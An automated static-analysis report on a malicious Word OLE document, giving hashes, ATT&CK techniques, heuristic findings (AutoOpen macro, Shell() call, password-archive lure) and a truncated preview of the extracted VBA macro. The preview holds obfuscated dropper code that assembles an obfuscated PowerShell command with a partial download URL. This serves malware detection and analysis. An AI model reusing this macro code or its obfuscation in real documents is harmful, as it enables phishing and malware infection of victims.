Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c66d88f7e67e066…

MALICIOUS

Office (OLE)

191.0 KB Created: 2017-12-11 15:42:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 5ee6c50eab9913448ff471f2d3c41687 SHA-1: de22e9e52ae977140abf9f49cdab7dd2c7250642 SHA-256: 3c66d88f7e67e066b4ee9d961c94a03d80d78360bb0f53150104a7a8c5a08ff4
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within its VBA macros. This, combined with the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, suggests the macro is designed to execute arbitrary commands. The SE_PASSWORD_ARCHIVE_LURE heuristic and ClamAV detection as 'Img.Dropper.PhishingLure' strongly imply the document is a lure for a password-protected archive, intended to trick the user into opening a malicious payload.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 74837 bytes
SHA-256: 41f968f0cc2f47157888a34c034ac9a3b67cadb3e149b0b48cd1817cbfe98ef6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sJSaBGIOoChzj"
Function RESrBjcolH()
XMiGBajZfc = UCase("tKftFzh" + "uUiSLoD" + "GjUcqwN" + "AwFiXVB" + "bGSaJVfLIth") + UCase("wQFZEzqZuYLu" + "bsHrzfZTCrEWdr" + "DITzRfHjtfda" + "ciCuXdicYTJ" + "IPuZADbFF")
zRIisUj = Mid("ZEYEF2c+h2cSh2c+h2cplWRG3izmDU", 6, 16)
uQupMJ = UCase("szwnXns" + "zLmzQDpQh" + "qPaBjIRzcOwinM" + "mhvzhKztFZOV" + "jzdkOwpTcqToV") + UCase("KiURYZNiVuT" + "oqWUcSm" + "QfkOUqWSJrc" + "LkpPlIqw" + "CbjQOIwzIOA")
iMJhrbiF = UCase("lFOdRUIOLV" + "uqUpJzz" + "IfpKjJQM" + "scCUZGww" + "tMNTJInJNYa") + UCase("qEcwzqwufUBH" + "VjTjVkXsdFmwoV" + "XZvsmaBYZYcQ" + "CAYKGVn" + "TZsnCrMwpz")
OXPOjMQ = UCase("nXvMHCtCfDN" + "QNKcmLsFVk" + "JmRSWLZW" + "QwcEfkm" + "GjGBGzwdIqjS") + UCase("TICMlapjX" + "FjNISlGwBZGzm" + "ICmUpNVqDlw" + "ZrtJwCisBVtqd" + "BthtIUVYEjoVu")
idHDpNAVt = Mid("7jcItem(h2c+h2cUeZB+eZBJeZB+eZBhhh2c+h2cuaeZB+eZUmlE9iz9Pbfi", 3, 46)
YJtCPKr = UCase("UOXFYJUY" + "KuLsTXqdjc" + "SiHDADEkipZkY" + "wliuABlzTO" + "NzUfBjSNJp") + UCase("HUFVFjpilKmY" + "lMijbEVOtd" + "DjFhFHWPdKiJ" + "ivBIpcPbaztoA" + "mEUYNrTSViHY")
PWjSAwCjco = UCase("UPcbLcLP" + "scDQucn" + "wrzMcIJd" + "UBmKVbIYXmt" + "iAjlqpRED") + UCase("wRZrizzsGSw" + "IKdrXBvsWptq" + "qQblSsYYs" + "VkdzLbf" + "aUusWIwSQJL")
AGqbkza = UCase("NiThEJOQoc" + "HNQPqCXWa" + "rzXjbVIC" + "zjTipURDtwcV" + "pFciNWvNvmJSVk") + UCase("AdnGOCdiojavYw" + "XzlvISDtIlH" + "DwJMTjWDQK" + "HtMboznbWO" + "OMjaccwjf")
KHCPMritdf = Mid("35RGO7DiGTwZO'+'E)[1,3]+eZBxeZB-JOineZBeZB) ( ('+'(eZB. ( e'+'ZB+eZB([sTR'+'Ing]7c9VErbosEPreFeRE'+'nce)[1,3]+h2cxh2c-joinh2ch2c) ( (h2cUJ'+'hfh2c+h2cransbdhi8wnAifsp", 14, 140)
iIMRVPVWi = UCase("HXjZojV" + "oZZLQGHG" + "DkQqKTWWwuTmA" + "PMnwwBDIiFY" + "AujbQAsZMYvOz") + UCase("NCqmCUo" + "KwdJJFpvFKSTSb" + "WdSuaPqRYzuoB" + "sDECCklwH" + "mjRSkwdmlPTIk")
jiEWkKSEvNj = UCase("HdZhfXGLCv" + "NbdCwrPtU" + "kJmhwftG" + "GjfAAPmtJcjPT" + "DBlCXjlhq") + UCase("LWUnzirN" + "Johhadn" + "zGRotQqj" + "LcWaHZqVpdu" + "takTKKiVUKYjWo")
ErzzkEB = UCase("zEuLuPvGUj" + "hAWGDvjJ" + "zMAObFcLMtBU" + "ZwfJPkfwcisqFX" + "zNmdOZZmDjk") + UCase("nktaiombZbufw" + "kWiHXVizOwH" + "FWzJbcfvrM" + "INCTvDWTGhko" + "IwIOGoV")
OKWhfjC = Mid("fmGDp5ljT0U1td8hG][CHar]39)) eZB)  -cRePLAce  ([char]104+[char]50+[char]99),[char]39 -rEplaCEeZB7c9e'+'Z'+'B,[cha'+'r]36 -rEplaCE eZBxC6eZB,[char]92)) ') -CREPLace ([ChAr]114+[ChArh0ja4wC", 17, 164)
KARsIloBX = UCase("YVSGdETWPqi" + "OrMlAsK" + "fjViGLN" + "ADmETwRz" + "XRuZDVcjHP") + UCase("HZYrLkvsAjz" + "qIWLEZiQZ" + "OdbPibLs" + "wvjEafv" + "jDZwnXzERhJYG")
pPPaUAtVN = UCase("SGiPbQzRABmYnV" + "VBmvsfBrUhzAfT" + "oDrnpHTDU" + "WBFjwPOmCnNUt" + "QRONhdPTwjM") + UCase("hAjmBzRIVdvL" + "SiOdjDUJOX" + "sGVqYDCWTP" + "OGPlPCkHmVDr" + "vBpSjsZTc")
IbVRZZzuDR = UCase("RdlRcRnScujs" + "iDskNOatEtDO" + "JbqpIXlDS" + "bbpuFRFZNsrLO" + "pojkqNki") + UCase("PIMbnmI" + "hPLQIXUV" + "zUpVVzMizUq" + "NFHsYZm" + "qSmFmKwDrhQMP")
cVSRrztE = Mid("abFns4bch2c+h2c ih2eZB+eZBc+heZB+eZB2cnh2c+h2c Uh2c+h2cJhbcd'+')h2c+h2ceZB+eZB{try{eZB+eZBUJhh2c+h2cfh2c+h282Jqm4zQ5PWuYYlvrA", 7, 101)
DzLPhTc = UCase("uvbakSaZ" + "HjTHOunRZHkCp" + "GvWNkqapP" + "zVqobAoLwLjj" + "tbXsbAMrGEj") + UCase("fNEqjRRUhJ" + "EwpYSZFifaUdm" + "zzpDurQJ" + "wnkVNtRLt" + "iTtlctSAaBvK")
KNubqvCc = UCase("NPtitKztn" + "REUKDYkzh" + "lhhjiLBJqSE" + "mzrszpjbtzi" + "ohqlzTwSin") + UCase("jiJzhJqCUNn" + "WTLYvRFin" + "MvBVPJX" + "lzzTKJppwS" + "vKHAPTS")
JEsWq = UCase("nZBtiuz" + "FkwLzkkRqHOO" + "BRFJobZKAWmhb" + "ZWzzbGA" + "mTKFJAEjzLUPmI") + UCase("juTYXEOJdYjKur" + "nHpFilwi" + "YFQXbNLOQ" + "QDHicrYKhhZ" + "JspXMajiKlLAz")
VTbZA = Mid("zRpG1V/,hth2c+h2ctp:'+'/h2c+h2c/karh2ciw5amEUnMioNPP4hqw7K5YNJo4Jiqs7", 5, 34)
lznDziWf = UCase("uBAYEqiWNwMtj" + "wboSCICjFSn" + "ssEvmBzWdUk" + "udjmcrmZWQL" + "MwRJlLwilZz") + UCase("RSLKvKAiqOXY" 
... (truncated)